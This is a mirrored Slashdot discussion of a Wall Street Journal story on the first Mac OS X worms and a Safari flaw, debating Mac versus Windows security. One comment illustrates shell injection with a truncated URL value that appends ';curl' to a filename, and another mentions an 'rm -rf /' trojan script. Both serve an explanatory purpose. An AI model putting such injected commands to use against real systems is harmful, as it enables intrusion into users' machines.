Slashdot Mirror
Computer 'Worms' Turn on Macs
Carl Bialik from WSJ writes "Macs have been laregly immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"
A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.
Now there's a neutral party with no agenda when it comes to security!
Honestly, the worst Mac malware I've seen so far had a Symantec sticker on the box.
Fleur de Sel
seriously if you have to manually download the program and enter your admin password, it is not a virus or a worm. I dont know why people keep calling it that. It is a Trojan and those have existed since the first rm -rf / script.
The war with islam is a war on the beast
The war on terror is a war for peace
Windows has had what, like 200,000 Virus's in the last year? Apple has had two or three theoretical exploits that either require the user to run code by hand or else target services that most mac users don't turn on. Sounds like Apple is doing its job to me. And honestly this idea that as Apple gets more popular there will be more viruses is largely a load of crap. The notoriety of writing the first real virus for OS X would be vastly more than for writing yet another windows virus. The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed. I think if people start writing viruses for Apple it will be because Apple gets lazy and stops innovating, or else stops at least trying to fix the bugs in its software. Because right now both the means and the motive or there, but it's just not really happening.
but don't think that running an "obscure" OS makes you safe
*sigh* We don't. We think running an operating system with proper security makes us safe.
"The dew has clearly fallen with a particularly sickening thud this morning"
I guess this will test whether Apple's approach to security (i.e., pretty much like Unix's) is better or worse than Microsoft's.
I.e., will these worms affect the whole computer because of a fault in the operating system, or will they affect only a single user on the computer because of a software issue that let the worm in to play in that user's space, or will it affect people only because of user stupidity ('ooh, really, clicking on this will make my pen0r bigger!')?
Note that Microsoft gets critical security issues fairly often with their approach.
The recent Apple issues have been lowest rated security issues.
Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted.
You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
Folks don't need to worry.
Using google images as a definitive source, I tried the following searches
Microsoft worm
and
apple worm
Surprisingly the Microsoft one was filled with warning messages and exclamation marks and maggots.
Meanwhile the apple one was all cutesy and cartoony and fluffy (some of the worms even appear to be wearing turtle necks)
The world will continue to turn.
liqbase
Every piece of code is subject to exploits. Show me a program/OS that is 100% infallible and I will show you a liar. I think that the main reason OS/X (and *nix for that matter) was considered to be rock-solid is because very few people were taking shots at it. Now I do realize that *nix-based OSs do plug up the obvious holes that MS left open. But don't assume that just because no one has broken into your house yet that your house is completely secure.
A computer is only as secure as its maintainer. I am running a small network at home that has a mishmash of linux and Windows computers. Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid. The same thing applies with this story - Macs can be exploited because that is the nature of the business. We usually find the holes because some numbnut exploits it.
Just my $0.02
- Andrew
I meta-moderate because I care.
We already know Microsoft's answer, but how does Apple deal with bugs in Mac OS 8 and Mac OS 9? (And does anyone still use Mac OS 7?)
[Fuck Beta]
o0t!
Hopefully very few. With the current state of affairs, anti-virus software for the Mac is a case of the cure being much worse than the disease. Even these recently discovered worms and the Safari vulnerability are relatively benign and can be protected against with a little common sense. In fact, most users hopefully are already safe from the Safari vulnerability since the "Open Safe Files" option was already the source of another vulnerability a while back.
By the time these vulnerabilities make it into the virus definitions, they are old hat. Plus, at least one *cough* Norton *cough* anti-virus for the Mac actually introduces a considerable number of new security vulnerabilities to the OS.
Sure, running anti-virus software on our machines will catch all those old Windows exploits but I'm not compromising my system to protect somebody else who didn't bother taking steps to protect their own machine... sorry.
If/When we start to see a critical mass of malicious viruses, trojans, or other malware targeted at the Mac that aren't stopped by common sense practices, then I'll look into Anti-Virus software... no sooner. Yeah, perhaps there's some risk in doing that, but far less risk than with running anti-virus software right now.
It's never been that (at least for most people). The advantage of Mac OS X is that it is less vulnerable than Windows (making Windows an easier target), and that Apple made decisions in the design process that mean that the typical consequences of a flaw are less severe. In recent years, Microsoft has attempted to harden Windows further and reduce their exposure - in W2K3 Server, for instance, they've done a pretty good job of it.
Even if Apple magically pulls some sort of super OS-jujitsu that reverses their market share and Microsoft's, the basic architecture will stay the same underneath - and that means Apple will have their relative advantages intact for the foreseeable future. Windows is, as its heart, an OS that has traded off many security options for ease of access and ease of programming. Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.
There will be viruses that attack Mac OS X. Some will do a pretty good job of attacking. I'm kind of surprised it's taken this long to get there. But I'm also not expecting it ever to compare to Windows in that regard.
-- Josh Turiel
"2. Do not eat iPod Shuffle."
Folks,
The key thing to eyeball here, with all the FUD that has been stirred up, is there are OS vulnerabilities and application vulnerabilities. Much like the annual brew-haha when we comapre Linux versus Windows, you must make a clear differentiation.
Like Linux, I would never count, say an Apache hole against Mac nor Linux, since it's an application that is added after a base install. However, unlike Mac or Linux, Windows flaws are very much a hybrid. Windows really doesn't function much as Windows without IE (try reviewing a browser hijack, and see that the file explorer uses the IE render engine to see that an IE flaw is an OS flaw), and subsequent issues with IE are counted against the OS.
The issues found recently with Bluetooh OBEX and the Safari "open anything" flaw are two examples of differentiators. the OBEX flaw, is yes, a core OS issue, however, it was identified and patched two patches ago (10.4.3), Apple is no longer shipping the OS in that rev anymore. Minus one to OS security for Apple. Hoever, Safari, an application above the core OS, had a "bad settings default" besides the overall flaw in the app. In short, both are avoidable through an alteration in settings or application of an old patch. To be surprised that the Mac is "insecure" by the press FUD is rediculous.
Windows, as I sit on Microsoft briefings to my company each month, have not only application security issues on a predictable and regular basis (slow months in the summer and December are do to staff vacations), but because many of those apps are so tied into the core workings of the Operating System, that each new flaw opens a bigger hole that build upon each other. A standard install of XP out of the box takes 38 patches plus the two required to just upgerade to the latest version of Windows Update. WTF?! And that does even cover the OS settings needed to make it "generaly" safe to put on the Internet.
I feel safe putting ANY Mac, BSD or Linux box on the net for a half hour while I patch, because, in general are most of the distributions have reasonable defaults set, but, as they stay current, it makes it much less appetizing for the latest virus, worm, or hax0r than your default XP install. As it is with big business security, you don't nessesarily have to be the most secure, you just have to be less appetizing than the next guy down the row.
I'm truly sick of the news media (print, on-line, and TV) spreading unknowledgeable FUD to the masses, just because it's "something different" without recognizing why it may be different, let alone the overall truths. Remember kids, duck and cover!
From the linked article:
The situation just isn't as simple as you believe it to be. Sure, the number of people who use an operating system tends to have a relation to the number of people who develop for that system and also the number who have the skills necessary to create a virus, trojan, or worm. But there's more to it than that. Windows, although it's getting better, and hopefully Vista will be much better, has architectural issues that make it easier to exploit. It also has consumer-targeted development tools which have the sole intention of lowering the bar to new programmers. Combine these two, and you have a societal petrie dish ripe for creating malware authors - not only are there more people using the OS, but there are proportionately more people capable of writing malicious software and a system that is easier to exploit.
If the Mac had 95% market share, there would certainly be more malware, but the situation would simply not be as bad as it is for Windows right now.
yep, the last exploit relies on people to be morons and try to open an apparent 'picture' from a random spammer, or a strange website/whatever. Which could happen with any OS. Except if the user isn't running with full admin priveleges then they are going to be fine anyway..
which is totally what she said
The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed.
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds. More likely, the profit motive isn't there, probably a result the combination of greater security on OSX, and smaller installed base.
Running anti-virus software is a stupid thing to do when you can FIX the system instead.
What's the phrase? There is no patch for human stupidity?
Go ahead, be smug about it. But the bottom line is that as Mac becomes more popular you're going to have idiots who are going to let thing thru simply because they don't understand what they're doing. Do you really think that Windows user who keep their systems up to date and use a bit of common sense are the ones you're reading about? Windows is insecure in a lot of aspects, sure, but a Windows user with a dose of common sense and some knowhow aren't suffering as much as the normal MS bashing article here would have you think.
Dedicated Cthulhu Cultist since 4523 BC.
Typical 'man bites dog' approach. If it is unusual, it is news. Microsoft Windows is a bug ridden unsecure OS, but since everyone (or at least 90% of users) use it it is not news. No one questions why a defective product exists or what it is actually costing in lost productivity. It is normal in most users' worlds, those users who never have experienced anything else.
OS X exploits are news only because they are unusual (though it does serve as an early warning, I sincerely hope Apple is busy auditing their code base). The fact that they are not as severe as Windows exploits, requires more user intervention and are often limited in scope are not discussed or probably understood by most people.
putting the 'B' in LGBTQ+
Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.
.NET does solve buffer overruns (unless you make any calls into Win32 or other C code, which Microsoft makes unnecessarily difficult to do correctly), but it pushes threads even harder. Secure software has to be correct, and threaded correct software is an oxymoron. Now you've got race conditions. The only race condition I usually have to worry about in a typical Unix software package is use of tmpnam() (and every time anyone compiles a piece of software, they get warned about it).
It's not that Linux is secure. It's that Windows is *insecure*.
Microsoft had a long period (perhaps over?) where they introduced *horribly* insecure designs -- making decisions that completely ignored security in the name of any shred of functionality that they might gain. (And those designs still affect us today.) Double-click execution of executables in email, using their full-blown web browser to view emails (which escallated any security hole in a web browser into a worm-class bug), default of no Administrator password on NT, default share all drives (but make them "invisible" to other Windows machines), design a windowing API that essentially makes local security on a computer impossible, have a system where each file has many names (which makes it damned difficult to write a secure server), encourage people to use threads (because their OS lacked copy-on-write), omit the ability to create chroot jails from their OS, run all kinds of servers by default (remember Messenger Service and the spam that you *knew* was going to happen?) allowing IP-baed access and then proceed to blame sysadmins for not firewalling Windows boxes because Win machines weren't usable out of box on the Internet, bundle telnet but not ssh, and so forth.
Hmm...other goodies. POSIX places hard bounds on what calls do. Microsoft provides MSDN, which provides some examples and no guarantees. It's a tutorial, not a spec. Writing secure software when you don't have guarantees on *exactly* what a call can do or will do in future revisions of the OS is damned impossible. Because Windows isn't a very usable multi-user machine, software authors essentially ignored local security for years -- most Windows software can be attacked every way to Sunday locally (though I'll grant that this wasn't directly MS's fault). There are local security vulnerabilities in Unix software as well, but people actually *care* about them and fix them if they can find them, and don't just introduce them without a care in the world.
Secure software is correct software, and because Windows tries to guarantee binary compatibility and there is only one Windows, developers don't often look up the spec (when I code serious software under Linux, I have the C99 spec in one window and the POSIX spec in the other). It's just a matter of "well, I've passed in this invalid value and it seems to work, and it'll probably keep going". That drives me nuts. Try saying that on comp.unix.programmer, and you'll discover a higher standard.
And MS is still doing it. Okay,
Now, Microsoft provides lots of security *administration* tools. They provide a sophisticated (I'd even argue overcomplicated -- in the vein of VMS, the problem is not a lack of controls, but in users not understanding the system fully) ACL system. The rules for what exactly happens with permissions when copying files around are bonkers. Sure, most users don't care, but if you're trying to write a system that doesn't have security holes, it's a royal pain in the ass. If it takes a ton of work to figure out and write something properly, developers will just stuff a maximally-permissive ACL on something -- under Unix, you have exactly 12 bits and an owner and group to worry about, and there's the extent of your permission system.
But the problem isn't a lack of frontends and tools. It's the coding and design practices, and that's just ha
Any program relying on (nontrivial) preemptive multithreading will be buggy.
I haven't seen any compelling evidence that Linux or MacOS X are more secure than Windows is against the twin threats of malicious software and badly trained users. They're all based on similar security ideas, which just don't cut the mustard. A better security model does exist, but it's not implemented in any desktop operating system today.
The only supporting argument for this oft-repeated fallacy is that Windows has the biggest market share and the biggest number of security holes.
Far be it for me to shatter your little bubble, but Apache Web Server is more popular than IIS, and has significantly less critical exploits.
God, it feels like Karma whoring just pointing out something so bloody obvious.
"The dew has clearly fallen with a particularly sickening thud this morning"
Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.
All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.
Imagine two situations. In the first, everyone is using a Windows machine. In the second, half are using Macs and half are using Windows. Everyone has 5 random other machines in its address book (e-mail addresses of the primary user). In the case of a zero-day exploit for Windows, how quickly will the all-Windows cluster become infected?
In the case of the Mac/Windows hybrid cluster, though, the speed significantly decreases and it becomes possible that some machines will never be infected. Why? Each machine sends out 5 e-mails; those that go to Macs will not be exploited. That means, on average, each machine can only infect 2.5 others (rather than 5) and the path to any Windows machine must not intersect only Macs.
In a real world situation, the lack of intersection is the smaller problem (since most people have everyone's e-mail in their address book), but if you're wasting resources sending out suspicious e-mails to Macs, you're mitigating the advantage of the zero-day exploit.
Agreed: If you want Mac malware, you have to go to a store and buy it.
It's completely unacceptable that Slashdot editors would post this garbage. From the referenced article:
"In the past two weeks, information-security companies like Symantec Inc., Sophos PLC and McAfee Inc. have identified several security issues related to the latest version of Apple's Mac operating system, called OS X. Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."
Translation: Some public relations drone, with no technical knowledge, paid the Wall Street Journal to post the article. The Wall Street Journal is a "What the rich want you to think" publication, and, in my experience, usually unreliable for anything useful. Note that the article jumps from subject to subject rapidly, apparently to hide the fact that there are no actual incidents of Mac infections to report.
Another translation: Symantec, a maker of very buggy security software of poor design, and other "security" companies want Mac users to buy their products.
Some people, in my opinion, spend their entire working lives being dishonest, trying to trick other people. In my experience some of them work for WSJ.
-
Cheney's company is rapidly building prisons for the U.S. government.
The guy who wrote this article doesn't know what he's talking about. "Worms" spread without any user interaction -- they can infect millions of machines on the internet in hours. Those are the kind of vulnerabilities that got Microsoft in trouble in 2003. Viruses require user interaction to work. All the "vulnerabilities" described in the article require the user to install a program and it's trivially easy to be destructive once you have the user's trust.
In addition, virtually all the vulnerabilities described by the article are local ones -- meaning a malicious person needs access to the machine. Truly dangerous vulnerabilities offer remote access, which means any random hacker on the Internet can control the machine from afar. AFAIK, none have been discovered in most Linux distributions or OS X. If OS X did ship with remote vulnerabilities, THAT would be huge news.
The only relevant part of the article comes at the very end:
Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called "social engineering" techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs. The Anna Kournikova worm from 2001, for example, infamously tricked Windows users into installing it by masquerading as photos of the leggy Russian tennis star attached to e-mails.
Rather than weaknesses in operating systems, such approaches exploit "a bug in peoples' brains, which is much harder to patch," Mr. Cluley says.
That should have been the lead. The rest of the article is idiotic.
The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...
The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time this is fundamentally insecure, and yet the native browsers and third party ones still do it.
This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http :
Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.
What's safe?
Well, there's two options.
1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.
2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.
Here's some options that have been tried and don't work:
1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).
2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).
3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).
So far Apple's tried two of these, let's hope they don't try the third.
* Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
Totally irrelevant to what I had posted. Also, again, they already know that their new code is also going to be just as subject to viruses as their old code was - that's why they're including an anti-virus. Microsoft can't make a reasonably secure operating system. Its not part of their culture, nor part of their technical capabilities.
Vista is going to be holier than swiss cheese, and Microsoft already knows it. Thats why they're working so hard to make the patching process easier - its going to be needed just as much. Ditto for including an anti-virus. Because they can't fix the underlying code. It was crap in 1982. Its still crap today.
Windows is so far ahead in the malware world, there is no way that any other system will ever catch up to the hundreds of thousands of viruses, worms and trojans that is essential to the full Windows experience.
Oh well, what the hell...
Symantec speaking baddly of Macs should work for them both ways. Prevent people from switching away from the arch they sell most product for AND frighten Mac users into buying their crap.
They will only be able to demonize Mac's for so long, until people realise that they are harder to exploit on a large scale because they come with less insane defaults.
BTW, if you really REALLY want to fuck up your Mac install... install some Symantec products. A serious downgrade.
War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?